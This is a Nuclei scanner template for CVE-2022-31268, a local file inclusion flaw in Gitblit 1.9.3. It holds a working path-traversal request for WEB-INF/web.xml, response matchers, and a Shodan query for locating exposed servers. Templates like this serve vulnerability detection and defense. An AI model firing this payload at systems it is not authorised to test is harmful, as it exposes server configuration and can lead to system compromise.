56 lines
1.8 KiB
YAML
56 lines
1.8 KiB
YAML
id: CVE-2022-31268
|
|
|
|
info:
|
|
name: Gitblit 1.9.3 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
|
|
remediation: |
|
|
Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268).
|
|
reference:
|
|
- https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
|
|
- https://vuldb.com/?id.200500
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31268
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-31268
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00618
|
|
epss-percentile: 0.76513
|
|
cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: gitblit
|
|
product: gitblit
|
|
shodan-query: http.html:"Gitblit"
|
|
tags: cve,cve2022,lfi,gitblit
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/resources//../WEB-INF/web.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</web-app>"
|
|
- "java.sun.com"
|
|
- "gitblit.properties"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100855854f5b78271e7190a541945222c4988b44f63aaf28dd411abf25936b2cf0e022100ff18916ee95c556ec1921631f1962d419f54af2e3ca1c6d4890117daaae99263:922c64590222798bb761d5b6d8e72950 |